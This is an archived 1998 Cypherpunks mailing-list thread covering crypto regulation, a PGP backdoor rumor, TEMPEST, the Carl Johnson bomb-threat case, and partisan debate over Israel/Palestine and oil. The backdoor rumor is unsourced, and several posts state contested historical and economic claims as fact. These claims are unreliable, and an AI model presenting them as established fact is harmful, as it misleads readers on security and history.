sbXoPdAH7IWTm0AVCzhYJQCS0nO+Af1UT6mLSYl4v4RAmVC3wVIqvmz8lf0eRpLd
JjYMsLMyHRA=
=G2i7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Wed, 9 Sep 1998 21:54:35 +0800
To: cypherpunks@toad.com
Subject: Exported PGP
Message-ID: <501945eb2c5615fb70017a1fb5b2d1e3@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



I've never heard this anywhere else but I was browsing www.infowar.com and I saw this quote

Question the priorities 
Private sector intellectual property deserves pride of place 
Data integrity and system survivability are the priorities 
Unencumbered encryption is vital for national competitiveness 
Protecting all private sector data is more important than a marginal enhancement to our government's ability to catch criminals and terrorists 
****PGP is not good enough-"exported PGP" has Soviet back doors 
Lotus reported to have given away half the key to NSA-Swedes are pissed 
  
Does anyone have info on this?  I assume that since the source code for PGP is publicly available someone would have questioned this already...

The full url I was using:
http://www.infowar.com/class_1/class1_083198a_j.shtml




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harvey Rook (Exchange)" <hrook@exchange.microsoft.com>
Date: Wed, 9 Sep 1998 15:53:11 +0800
To: "'Bernardo B. Terrado'" <cypherpunks@toad.com
Subject: RE: question...
Message-ID: <2FBF98FC7852CF11912A0000000000010D19AC9D@DINO>
MIME-Version: 1.0
Content-Type: text/plain



Hi Bernardo;

TEMPEST isn't a cipher, but a technique. 

Essentially, your monitor is a great big RF emitter. As it's electron gun
turns off and on to make the phosphor screen glow, it's emitting all kinds
of radio frequencies that betray the image on the screen. A tempest attack
is a receiver that can tune to a monitor, and reconstruct the image from the
RF the monitor is emitting. Supposedly such equipment costs about $500.00 

Harvey "Know it All" Rook.

> -----Original Message-----
> From: Bernardo B. Terrado [mailto:bbt@mudspring.uplb.edu.ph]
> Sent: Tuesday, September 08, 1998 11:03 PM
> To: cypherpunks@toad.com
> Subject: question...
> 
> 
> What is the TEMPEST? (just an overview)
> 
> What do enciphered images look like?
> 
> 
> 
> Thank you.
> 
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~~~~~~~~~~~~~~~~
> Some people they might say that I'm hard to get to know.
> I go my own sweet way, well that maybe so.
> Something about the crowd that makes me walk alone. 
> I never had a need in me to be the party's life and soul.
> 
> It's me Bernie.
> metaphone@altavista.net
> ``````````````````````````````````````````````````````````````
> ````````````````
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 9 Sep 1998 12:52:44 +0800
To: cypherpunks@Algebra.COM
Subject: Checking CDR
Message-ID: <199809091748.NAA15881@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Those of us on cyberpass.net are not getting mail this
morning so I've subbed to algebra and ssz to see if the
x-posting is working.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BMM <bmm@minder.net>
Date: Wed, 9 Sep 1998 13:03:39 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Checking CDR
In-Reply-To: <199809091748.NAA15881@camel8.mindspring.com>
Message-ID: <Pine.LNX.3.96.980909135324.8453A-100000@waste.minder.net>
MIME-Version: 1.0
Content-Type: text/plain



Looks like rigel.cyberpass.net has been down for about 24 hours.  Hardware
problems?

On Wed, 9 Sep 1998, John Young wrote:

> Those of us on cyberpass.net are not getting mail this
> morning so I've subbed to algebra and ssz to see if the
> x-posting is working.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.sf.ca.us>
Date: Wed, 9 Sep 1998 16:35:47 +0800
To: John Young <jya@pipeline.com>
Subject: Re: CP Cite
In-Reply-To: <199809091318.JAA17051@camel7.mindspring.com>
Message-ID: <Pine.GSO.3.95.980909134804.8451P-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



I link to I believe seven messages in my article today.

The one that Gordon apparently cites is this:

[Bienfait Nutly News-Sidney, Montana]A BIENFAIT CYPHERPUNKS
Distributed meeting took place early this morning via an
BlackBox hookup between the South 40, in Sidney, and the
CoalDust Saloon, in Bienfait.
The main issue of discussion was as to whether anyone was
sober enough to remember where the MadBomber In Possession
Of The Last False Smile had actually placed the bomb before
embarking on a middle-leg of the TruthMonger SoftTarget Tour
of Planet Terra.

Estevan City Police, hearing rumors of the Virtual Attack
on the Saskatchewan Justice System via the MeatSpace tools
commonly available to those who own no firearms and don't
need no stinking badges, chose to delay a search for the
bomb, in order to plan what type of news spin should be
put on the event in order to maximize the justification
for an increased local police budget to combat international
terrorism, child pornography, drug-dealing and A HorseMan

-Declan


On Wed, 9 Sep 1998, John Young wrote:

> We're putting together copies of cpunk messages Jeff 
> Gordon cites in the Carl Johnson complaint and have 
> found all in the archives except one dated June10, 1998. 
> Jeff describes it:
> 
>    15. On June 10, 1998, an anonymous message was 
>    posted to the Cypherpunks Internet group. In the
>    message, it is stated that the bomber "placed the bomb 
>    before embarking on a middle-leg of the TruthMonger
>    SoftTarget Tour of Planet Terra." The message also 
>    referenced an RCMP plan to "drive a known madman 
>    crazy enough to finally put him away turned bad, and
>    resulted in a backlash of death and destruction ..." I 
>    noted that this message contained information about the
>    courthouse bomb incident which had not previously been 
>    made public, and was written in a style and manner
>    which I recognized as being similar to other writings 
>    which my investigation has linked to JOHNSON. In his
>    interview with Special Agent Sheridan, JOHNSON 
>    acknowledged using the name TruthMonger, and also
>    stated he had psychological problems, both of which 
>    correspond to this message. 
> 
> We'd appreciate getting a copy (yes, Jeff, if you would, anon ok).
> 
> BTW, there's a brief message from Lucky Green yesterday
> in the archives on CEJ which did not appear on the
> cyberpass list, AFAIK, although it was sent to ssz.com. Do such
> gaps happen much in CDR?
> 
> Yeah, yeah, I post to toad, and aim to be the last one who
> does, so drive me AP-mad.
> 
> BTW2, anybody know what Linda Reed thinks of her infame?
> 
> BTW3, we heard from TX that CJ's music/perform art is going to 
> be boosted in concert with his god-sent cornseed of publicity.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Wed, 9 Sep 1998 14:39:24 +0800
To: cypherpunks@toad.com
Subject: question...
Message-ID: <Pine.GSO.3.96.980909140109.13630A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain



What is the TEMPEST? (just an overview)

What do enciphered images look like?



Thank you.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Some people they might say that I'm hard to get to know.
I go my own sweet way, well that maybe so.
Something about the crowd that makes me walk alone. 
I never had a need in me to be the party's life and soul.

It's me Bernie.
metaphone@altavista.net
``````````````````````````````````````````````````````````````````````````````






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Raymond D. Mereniuk" <Raymond@fbn.bc.ca>
Date: Wed, 9 Sep 1998 16:08:48 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)
In-Reply-To: <199809082359.SAA12044@einstein.ssz.com>
Message-ID: <199809092123.OAA17355@leroy.fbn.bc.ca>
MIME-Version: 1.0
Content-Type: text/plain



William H. Geiger IIIwrote

> Once an alternative fuel source is discovered that is more economical than
> oil, the arabs will slip back into obscurity.

Good point!  Ever wonder why a decreasing commodity non-
renewable resource is becoming cheaper as the known reserves 
become smaller?  

Maybe they want to sell it all before it becomes obsolete and 
maximize their income from that resource.

Within the oil business I have heard this mentioned in regards to 
natural gas.



Virtually

Raymond D. Mereniuk
Raymond@fbn.bc.ca




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 9 Sep 1998 14:22:46 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
Message-ID: <v0311070bb21c8458165b@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:52 AM -0500 9/9/98, William H. Geiger III wrote:
>In <v03110703b21c4777ca38@[206.189.103.244]>, on 09/09/98
>   at 09:58 AM, Petro <petro@playboy.com> said:
>>At 11:25 PM -0500 9/8/98, William H. Geiger III wrote:>>>In
>><v03110710b21b6a259806@[206.189.103.244]>, on 09/08/98
>>>   at 06:17 PM, Petro <petro@playboy.com> said:
>>>>	No, more like a get off our fucking land.
>>>Sure thing, and where you live, exactly who's land was it before you got
>>>there?
>>	Point is, the "Arabs" didn't start it, the UN/European leaders (US, UK,
>>FR, and RU) did.
>Both the Palestinians and the Jews living in Trans-Jordan wanted their own
>country. The UN resolution divided up the land based on population and
>gave each group their own country. Israel declared their independence, the
>Palestinians listened to the Grand Mufti and join in the holy war to wipe
>out the Jews. The Arabs lost, too bad, game over.
>
>And interesting note to the whole palestinian "issue" is that the majority
>of the population of Jordan is palestinian!! And long before the Intifada
>the PLO tried to take over the government of Jordan and were embroiled in
>civil war for most of the 60's and early 70's. The Jordanian Arabs finally
>kick the PLO out in the early 70's (71 maybe 72).
>
>
>>	If I move you off your property at the point of a gun, should I expect
>>you to _like_ it, even if I gave you what I consider "fair market value"?
>
>This re-wright of history might give you warm fuzzies but no one was moved
>at gun point off their land (at least not until the Arabs started the
>war). The Jews that emigrated to Trans-Jordan/Palestine *purchased* the
>land from the Arabs that were living there. Even after the war the
>majority of palestinians left on their own.

	Ok, I'm rewriting history, you say IN THE SAME POST:

The UN resolution divided up the land based on population and gave each
group their own country.

	--and--

The Jews that emigrated to Trans-Jordan/Palestine *purchased* the land from
the Arabs that were living there.

	So tell me, is there a difference between being _told_ you will
sell your house and move, and deciding you really would prefer to live
elsewhere? Oh, and when this artifical coutry was set up, did EVERYONE have
equal say in the government, or were certain Northern Europeans of jewish
faith considered more equal. Of course, being given the short end of the
political and economic stick couldn't be considered an incitement.


>None of the current Arab countries existed until the British carved up
>their conquered territory after WWI. If Israel is not "legitimate" because
>of UK/UN involvement does it follow that all of the Arab states that were
>formed at this time are also illegitimate? Perhaps we should should

	The region was carved up using an existing population, not by
importing one from a different country.

	Like Mr. May, I have no problems with anyone who wants to live
anywhere in peace and co-existence.

	The Israeli government is not interested in that, if it were
politically possible, they'd do the same to the Palistanians as the Germans
tried to do to them.

>I find it quite hypocritical of Americans who see the Israelites as
>occupiers and oppressors but would be outraged at calls to give back the
>south-west to Mexico. Tim, you want to give your ranch to some Mexican
>family since the Americans took that land from them? but then the mexicans
>would have to give that land back to some deserving "native" Americans as
>they took that land from them. But then again we would have to sift
>through the thousands of years of tribal warfare and migration to find the
>one true owners of the land.

	You seem to be saying that Conquest by Force Of Arms is acceptable,
then the PLO is still trying to take back what they lost.

petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 10 Sep 1998 10:03:00 +0800
To: Matthew James Gering <cypherpunks@cyberpass.net>
Subject: RE: Computer hard disc scanning by HM Customs & Excise
In-Reply-To: <33CCFE438B9DD01192E800A024C84A192845C6@mossbay.chaffeyhomes.com>
Message-ID: <3.0.5.32.19980909143613.00c51da0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> > Just set the BIOS not to boot to floppy, 
>> If the customs people have any clue, the first thing they do 
>> is hit DEL at the appropriate BIOS prompt
>I think you give them WAY too much credit, not to mention many systems
>give no such prompt. But highly suspect if anything they will check the
>BIOS *after* first not being able to boot to floppy successfully.

Any tax-collector who's illiterate enough to ask "Do you have Internet
on your computer" is probably not going to know what's happening,
especially given the disparity of system boot behaviour.

Some things may get their attention, like the sound card yelling
	"Begin destruct sequence!  10, 9, 8, 7....."
or, more politely, 
	"Stop, thief!  Help, someone is stealing this computer!"
or	"Virus detected.  Please remove the infected diskette
	and contact corporate security for further instructions"
but your basic subtleties like a Linux boot screen and 
copying the diskette to backup and then wiping it are 
beyond the typical border guard's technical training, and 
don't smell interesting enough to get his dog's attention 
(unless there's a good high-pitched tone as well.)

I may post a more thoughtful article about the offensiveness of this
practice or the technical cluelessness, but for now I'll just
rant about the sheer folly of allowing anybody to touch your computer 
whose primary training is in Shouting and looking for people who
match profiles, like Irish accents or obvious wealth or obvious poverty.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 10 Sep 1998 10:01:09 +0800
To: Robert Hettinga <cypherpunks@cyberpass.net
Subject: Re: computer implant in 1997
In-Reply-To: <v04011742b2099a3531ba@[139.167.130.246]>
Message-ID: <3.0.5.32.19980909144109.00c57ac0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



Nothing surprising about it - just implant your basic lost-pet ID chip,
and set up a detector to read it.  All commercially available except
perhaps the computer interface to the detector, which isn't
all that complex either.  The more interesting journalism question isn't 
the lack of archive-checking by the journalist or this year's
claimant to firstness, but what political spin the professor tried to push 
with his press release and interviews and whether it was accepted
blithely or skeptically.

>> > READING, England -- Professor Kevin Warwick claimed Tuesday to be the
>> > first person in the world to have a computer chip surgically implanted
>> > into his body.
>> [...]
>> > Warwick demonstrated the chip in action by walking through the front
>> > door of his department. "Good morning, Professor Warwick. You have five
>> > new emails," said a computerized voice activated by the inserted chip.
>> [...]
>
>Kac implanted a computer chip in his body last year [...]

>i wonder to what extent journalists fact-check these "firsts".
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jimg@mentat.com>
Date: Wed, 9 Sep 1998 16:45:22 +0800
To: aba@dcs.ex.ac.uk
Subject: Re: Carl Johnson's private key
Message-ID: <9809092144.AA11404@mentat.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam skribis:
> That was just a public key, though right?  Was a corresponding private
> key posted?

Oh, you're right.  I misremembered.  This was actually two public keys,
an RSA and an ElGamal.  Still, I'm pretty sure there was a *Monger
private key posted <some> time.

	Jim Gillogly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Wed, 9 Sep 1998 17:00:36 +0800
To: "Brian W. Buchanan" <brian@smarter.than.nu>
Subject: Re: radio net (fwd)
In-Reply-To: <199809091239.HAA15369@einstein.ssz.com>
Message-ID: <199809092202.PAA23854@ideath.parrhesia.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:57 AM 9/9/98 -0700, Brian W. Buchanan wrote:
>On Wed, 9 Sep 1998, Jim Choate wrote:
>> The FCC prohibits the transmission of encrypted data via analog or digital
>> signals by amateurs.
>
>I'd love to see them try to enforce that.  What about chaffing and
>winnowing?  Stego?  Transmission of random noise? ;)  Anyone have the text
>of the actual rules concerning this?

I don't know of a persistent web copy of the regs (only query-based ones,
where the queries are only good for a few hours), but the regulation you're
looking for is 47 CFR 97.113 -

"(a) No amateur station shall transmit: . . . . (4) Music using a phone
emission except as specifically provided elsewhere in this section;
communications intended to facilitate a criminal act; messages in codes or
ciphers intended to obscure the meaning thereof, except as otherwise
provided herein; obscene or indecent words or language; or false or
deceptive messages, signals, or identification"

As I understand things (and I don't follow communications law, so I don't
think my opinion is well-informed), the restrictions only apply to
transmissions within the amateur band(s); so that's not applicable to, say,
the FRS (family radio service, a band recently opened to non-licensed
communications - used, for example, by the small Motorola TalkAbout
radios), or cordless/cellphone frequencies. 

PDF copies of the FCC regs are online at
<http://www.fcc.gov/wtb/rules.html>; amateur ("ham") radio is at Part 97.

I'm working on a bigger rant about crypto and radio and guns and Y2K and
the net; the gist of it is that amateur radio people, who are generally
decent folks as individuals, have cozied up to the FCC to protect their
"radio privileges" and have been rewarded with a mountain of bureacratic
horseshit which outdoes even the idiotic regulations re crypto export and
firearms .. and it's enforceable because the people who got licenses from
the government to communicate with each other (but only in certain ways, on
certain frequencies, after identifying themselves) fall over themselves to
find people who *don't* think they need a license to communicate (or who
think that the First Amendment *is* their license), and they rat those
non-licensed folks out to the FCC. The FCC's got an army of unpaid
volunteer informers who watch their fellow subjects to ensure compliance
with these silly rules .. which leads to a situation where ham radios are
mostly useful for talking to other people about how the weather is in some
other part of the globe, and what kind of radio someone's got, and how big
their antenna is. The FCC (and parallel organizations in other countries)
are discussing liberalizing the regulations regarding amateur radio use,
and a significant fraction of the current radio people are opposed to the
liberalization, because it'll topple their little kingdoms and make their
hard-earned licenses and certifications uninteresting.

If you want to know what crypto regs and net use regs are going to look
like in 10-20 years, look at the amateur radio regs now - we'll have
citizens' committees (similar to the "block leaders" on GeoCities) who stay
up late at night, unpaid, watching their fellow subjects for signs of
pseudonym use, or the use of unlicensed/unapproved crypto, or "unlicensed
Internet broadcasting". The citizens' committees will explain that they're
dedicated volunteers devoted to keeping their communities "clean" and
"orderly", and that without their intervention the FIC would be unable to
ride herd on all of the wild people using programs nobody's inspected and
communicating with ciphers nobody can read, saying things that just
shouldn't be said because they'll make somebody upset or something.
Besides, children might be reading. Everyone wants to be polite, don't they? 


--
Greg Broiles        |History teaches that 'Trust us'
gbroiles@netbox.com |is no guarantee of due process.
                    |_Kasler v. Lundgren_, 98 CDOS 1581
                    |(March 4, 1998)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wayne Walker <wwalker@netcom.com>
Date: Wed, 9 Sep 1998 17:48:58 +0800
To: cypherpunks@Algebra.COM
Subject: SSZ is Down
Message-ID: <199809092250.PAA25688@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm sending this for Jim (ravage@ssz.com) as he is a bit too busy just
now.

He just arrived at home to find the dog pinned under the tree that fell
and took out the phones and the ISDN.

The dog is apparently uninjured (though only two feet from certain
death).  Don't know which dog.

The ISDN is hurt and probably won't be up till sometime tomorrow.
 

                               Later,
                                  Wayne
--
Wayne Walker
Austin, Texas
E-mail wwalker@pobox.com

"Real Programmers don't document, if it was hard to program it should
be hard to use"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 9 Sep 1998 16:37:57 +0800
To: Tim May <cypherpunks@cyberpass.net
Subject: Re: Cypherpunks as a Continuing Criminal Enterprise?
In-Reply-To: <199809090406.VAA31614@always.got.net>
Message-ID: <v0311070db21c9da607d9@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:07 AM -0500 9/9/98, Tim May wrote:
>Could our group be charged as a "continuing criminal enterprise" under the
>RICO statute?
>
>It occurs to me that if Carl Johnson, who is linked several times to our
>group/list in the court documents, is successfully prosecuted,then the Feds
>may be able to cite both Bell and Johnson as evidence of a conspiracy.
>Which probably wouldn't be too hard to prove, as many of us have admitted
>to conspiring mightily to undermine various institutions. (And we even use
>encypted e-mail, the very essence of a secret conspiracy.)

	As far as I know, conspiring to END the government, or change the
government is perfectly legal, as long as you are not planning on using
violence to carry it out.

	We (well, as many as are, we is a difficult thing on this list) are
prepared to _resist with violence_ the invasion of our homes, and (to a
different extent) the removal of our rights, but those are in themselves
illegal things, so defending oneself from them is the most basic
"inalienable right".

	Then again, we are dealing with the Peoples United Soverign States
Government.

>It might be fun to see them try this. Would they charge some of us as

	Well, at least for those of you rich enough to pay for lawyers. The
rest of us will either have to plea, flee, or die.

>ringleaders? Or would they declare the entity itself an illegal
>organization? (As they have done with various cultural, political, and even
>religous groups, like Hezbollah, the Aum religion, etc.)

	Hmmm, if they were to do this, how bout we have a second set of
servers running the distributed mailing list software under a different
name, say Sinderallapunx, or OldDemocrapunks.

	Ok, so being a "member" of cypherpunks is illegal, change the name,
let them have their "victory".

>Interesting times.


petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Elliott <melliott@ncsa.uiuc.edu>
Date: Wed, 9 Sep 1998 16:24:44 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: radio net (fwd)
In-Reply-To: <33CCFE438B9DD01192E800A024C84A19284623@mossbay.chaffeyhomes.com>
Message-ID: <v0402050bb21ca10effac@[141.142.103.240]>
MIME-Version: 1.0
Content-Type: text/plain



Pig Latin or even the old 10 codes as in 10-4 are against the amateur
rules.  The only allowed code scheme is morse code and Q codes.  Both are
clasified as a well defined language.  Using english and having a
conversation that means something other than the standard usage is also
prohibited.  If you don't like it then stick to CB-Radio.  At least that is
the FCC's position.




>So much for "no domestic crypto restrictions." I really hate when people
>say that, there are plenty, and export restrictions on cryptography
>software and cryptography in software DOES indirectly but substantially
>affect the availability and cost of domestic encryption, not to mention
>that most people download export-grade crypto from the web for
>convenience.
>
>Isn't there a similar ban on encryption-capable telephones and other
>electronic devices (other than computers).
>
>	Matt
>
>
>> > The FCC prohibits the transmission of encrypted data via
>> > analog or digital signals by amateurs.



Matt <mailto:melliott@itmail.ncsa.uiuc.edu>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Wed, 9 Sep 1998 16:50:26 +0800
To: Petro <petro@playboy.com>
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
In-Reply-To: <v0311070bb21c8458165b@[206.189.103.244]>
Message-ID: <199809092151.RAA07697@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <v0311070bb21c8458165b@[206.189.103.244]>, on 09/09/98 
   at 02:15 PM, Petro <petro@playboy.com> said:

>	Ok, I'm rewriting history, you say IN THE SAME POST:

>The UN resolution divided up the land based on population and gave each
>group their own country.

>	--and--

>The Jews that emigrated to Trans-Jordan/Palestine *purchased* the land
>from the Arabs that were living there.

>	So tell me, is there a difference between being _told_ you will sell
>your house and move, and deciding you really would prefer to live
>elsewhere? 

Yes it is quite obvious that there is a difference from being *forced* to
give up your land, and willingly selling it. As I said before NO ONE WAS
FORCED OFF THEIR LAND until after the war that the arabs started. When war
did start it was the arabs that were trying to use FORCE to push the Jews
off of the land that they had legally purchased!!

>Oh, and when this artifical coutry was set up, did EVERYONE
>have equal say in the government, or were certain Northern Europeans of
>jewish faith considered more equal. Of course, being given the short end
>of the political and economic stick couldn't be considered an
>incitement.

Please explain why Israel is an "artificial" country while the rest of the
countries from the old Ottoman Empire were not? How much say did EVERYONE
have when the British set up KINGDOMS in countries like Saudi Arabia,
Jordan, Egypt? Until recently Israel was the *ONLY* democracy in that
region. IIRC Jordan and Egypt are the only arab countries that practice
any form of democracy at all (and Jordan still has a powerfull king as its
head of state).

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2 means...CURTAINS for Windows!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNfb6MI9Co1n+aLhhAQEj6AQAoTIceRmxCIKd7mYwoN3mTtgWDKJWXL5V
6BRVKhamjqhBxcqroAXdxQHXD+ClMBSybT8IiSREewRW6F3JnFM9F7i3gylOHAdC
w4q7KIhKUKeB9jCK5YvBqqEIqKwqNRTZvph/bMGD5QrcnetjlfOuI4pO8s9r3ffU
I6Lv9GjB0lI=
=ZDbu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Wed, 9 Sep 1998 17:04:25 +0800
To: "Raymond D. Mereniuk" <Raymond@fbn.bc.ca>
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)
In-Reply-To: <199809092123.OAA17355@leroy.fbn.bc.ca>
Message-ID: <199809092205.SAA07866@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199809092123.OAA17355@leroy.fbn.bc.ca>, on 09/09/98 
   at 02:09 PM, "Raymond D. Mereniuk" <Raymond@fbn.bc.ca> said:


>William H. Geiger IIIwrote

>> Once an alternative fuel source is discovered that is more economical than
>> oil, the arabs will slip back into obscurity.

>Good point!  Ever wonder why a decreasing commodity non-
>renewable resource is becoming cheaper as the known reserves  become
>smaller?  

>Maybe they want to sell it all before it becomes obsolete and  maximize
>their income from that resource.

>Within the oil business I have heard this mentioned in regards to 
>natural gas.

Most of these countries are economically "one trick ponies" and have
little export revenue outside of oil. Because OPEC <sp?> has been a
failure at enforcing production quotas there is a surplus of oil on the
market thus driving down the cost (supply and demand).

There are also large reserves of oil in Alaska, Siberia and elsewhere that
are going unused along with other reserves that are too expensive to
extract the oil at current market prices. The so called "oil shortage" of
the 70's had more to do with Oil Companies profiteering than it did with
any actual shortage. I have seen estimates in the past of our domestic oil
reserves showing that we have enough oil to last another 100 years at out
current rate of increased consumption if we stopped all imports today.
Simple economics is that it is cheaper for us to import it than it is to
produce it domestically.

As much as the Greens whine and cry about alternative fuels, the simple
fact is that as long as oil is cheap no one is going to switch. 

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Windows?  Homey don't play that!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNfb9g49Co1n+aLhhAQHHrQQAvX6z+/JeHTGzcT5PDdM+OeXOMcYDEIR3
mGm0I+R2Y0xzOgT01Z2h6DwJvy3e/bddd7+vFNUWuSCcbD33sFOO7psYWBgf2Vny
xtnlNLQDjI54QLye/XIugRaUI50pSgDC/SOytIr7swB9fSHbgPYUlTulRb+EV5xE
I0P5hjaPOzU=
=f5ED
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sparkes, Ian, ZFRD AC" <ian.sparkes@17.dmst02.telekom400.dbp.de>
Date: Wed, 9 Sep 1998 23:13:16 +0800
To: cypherpunks@einstein.ssz.com
Subject: Re: Archives? What archives? (fwd)
Message-ID: <000001b000000184*/c=de/admd=dbp/prmd=telekom400/o=dmst02/ou=17/s=sparkes/g=ian/@MHS>
MIME-Version: 1.0
Content-Type: text/plain



Here's the deal...

if someone gets a copy of the archives to me somehow, I 
pledge that I will get them  burned and will distribute 
them for cost price. I assume there will be two CDs as the 
data is apparently around 1GB. I have already checked, and 
for a run of 300 (should be enough to cover all the 
non-apathetic CP list members) the costs are:
     DM1,67 = 92 cents each
     = $1,84 + VAT = $2,15.
Add postage onto this.

A really great idea would be to include the coderpunks 
archive on any space that were left over. But first of all, 
I'll keep the focus as the greatest enemy of 'good' is 
'great'.

Note: IMPORTANT: The rep was emphatic - you shouldn't 
forget that this price includes *2 color* labelling! Makes 
the offer kind of irresistable doesn't it?

Why am I doing this? Because just as Tim pointed out, this 
has been discussed more than once but there have been no 
results. At least none that I have heard of in the last 
year.

One point - I am outside of the US. Good for europeans, but 
perhaps a little expensive for US-CPs. Maybe someone would 
like to take over the US distribution. (WHGIII?) I could 
get 50% to the states for distribution.

Anyone wants to arrange this with me, contact me off-list. 
If no one does, then I'll start bugging people until 
something happens <g>... 

Ian

At 14:28 04.09.98 -0500, you wrote:
>In 
<Pine.HPP.3.91.980904210041.12475B-100000_cor.sos.sll.se>, 
on 09/04/98 
>   at 09:02 PM, Asgaard <asgaard_cor.sos.sll.se> said:
>
>>Ray Arachelian wrote:
>
>>>It was done... Remo Pini (www.rpini.org or some such) 
was the dude
>
>>www.rpini.com
>
>>Crypto CD Vol 1 has lots of stuff on it but I never found 
any archive of
>>the CP list(s). Perhaps I didn't look enough.
>
>I didn't find any either.
>
>Also someone mentioned previously of pre-1995 online 
archives. Anyone have
>a pointer to these?
>
>There is a local company here that does CD duplication and 
Harddrive
>archiving to CD. I can check and see how much they would 
want to burn a CD
>with the CP archives on it. I would imagine that list 
members would prefer
>RockRidge extensions? OS/2 supports both Joliet & 
Rockridge so it does not
>matter to me one way or the other. :)
>
>-- 
>----------------------------------------------------------
-----
>William H. Geiger III  http://www.openpgp.net
>Geiger Consulting    Cooking With Warp 4.0
>
>Author of E-Secure - PGP Front End for MR/2 Ice
>PGP & MR/2 the only way for secure e-mail.
>OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
>----------------------------------------------------------
-----
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Wed, 9 Sep 1998 16:09:56 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Cypherpunks as a Continuing Criminal Enterprise?
Message-ID: <199809092110.RAA08478@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: Tim May <tcmay@got.net>
   >
